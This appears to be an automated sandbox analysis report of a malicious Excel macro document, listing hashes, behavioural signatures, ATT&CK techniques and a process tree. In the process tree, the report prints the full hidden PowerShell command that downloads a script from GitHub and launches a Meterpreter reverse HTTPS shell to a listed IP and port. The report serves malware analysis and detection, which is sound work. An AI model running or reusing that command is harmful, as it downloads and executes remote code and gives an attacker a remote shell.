d627702c3d9513cca30da6b5c4ef1b3eb6b7850925d1921174e7783d32da1b74

General

Target

d627702c3d9513cca30da6b5c4ef1b3eb6b7850925d1921174e7783d32da1b74.xls
Size

44KB
MD5

eb3d0e5a24699ae2154c20f77b07fa1e
SHA1

fcc37ff2082378b1628c357f9f965015bf0ecedd
SHA256

d627702c3d9513cca30da6b5c4ef1b3eb6b7850925d1921174e7783d32da1b74
SHA512

5495857102b2cb09660b141c0b2c43663090a0f3ed0e6ae2a805c66276a72f7177c53306e235ab5e9c4f4549cf9c02ec4adff2e67ffb4904cceb5210626bb3f3
SSDEEP

768:Btvo+eUk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJET+juFlmQQcAOJ9acv9acyL:Z/k3hbdlylKsgqopeJBWhZFGkE+cL2Ni

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2860	powershell.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2616	2128	wscript.exe	29

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2576	powershell.exe
4	2576	powershell.exe
5	2024	powershell.exe
6	2024	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe
2024	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2128	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2576	powershell.exe
2024	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2128	EXCEL.EXE
2128	EXCEL.EXE
2128	EXCEL.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2616	2128	EXCEL.EXE	33
PID 2128 wrote to memory of 2616	2128	EXCEL.EXE	33
PID 2128 wrote to memory of 2616	2128	EXCEL.EXE	33
PID 2128 wrote to memory of 2616	2128	EXCEL.EXE	33
PID 2616 wrote to memory of 2024	2616	wscript.exe	34
PID 2616 wrote to memory of 2024	2616	wscript.exe	34
PID 2616 wrote to memory of 2024	2616	wscript.exe	34
PID 2616 wrote to memory of 2024	2616	wscript.exe	34

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d627702c3d9513cca30da6b5c4ef1b3eb6b7850925d1921174e7783d32da1b74.xls
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\SysWOW64\wscript.exe
  wscript C:\Users\Public\config.vbs
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8ON5EO232F1QJZPDA7YJ.temp

Filesize
7KB

MD5
e04ca006a1ee543873ee464a1087e5a5

SHA1
2bed6f6df142fd6ba8611016f24cda78ac5e4df6

SHA256
b9d984970f2fd2b3fb182d92b4ece9f1bb80eccb0919b280f55d3ffb46e9f194

SHA512
1c411457569e91b48f531db280dfb55816f71ff2d19d6bf5e86e7f99dd903723d4dac5724d1a9cc3799fd6dc11309f6ea1d7f98495c6c7b834f252c87bf0ca7d

Download Submit
C:\Users\Public\config.vbs

Filesize
461B

MD5
ce52ab154163c511f0efa6a61e22ab64

SHA1
9f12cc215e15802eddcb02cb5370ef16b21fa3a6

SHA256
df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

SHA512
cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

Download Submit
memory/2128-50-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2128-39-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-37-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-38-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-18-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-53-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-52-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-1-0x0000000073B8D000-0x0000000073B98000-memory.dmp

Filesize
44KB

Download
memory/2128-49-0x0000000073B8D000-0x0000000073B98000-memory.dmp

Filesize
44KB

Download
memory/2128-17-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2128-51-0x0000000006300000-0x0000000006400000-memory.dmp

Filesize
1024KB

Download
memory/2576-45-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2576-46-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing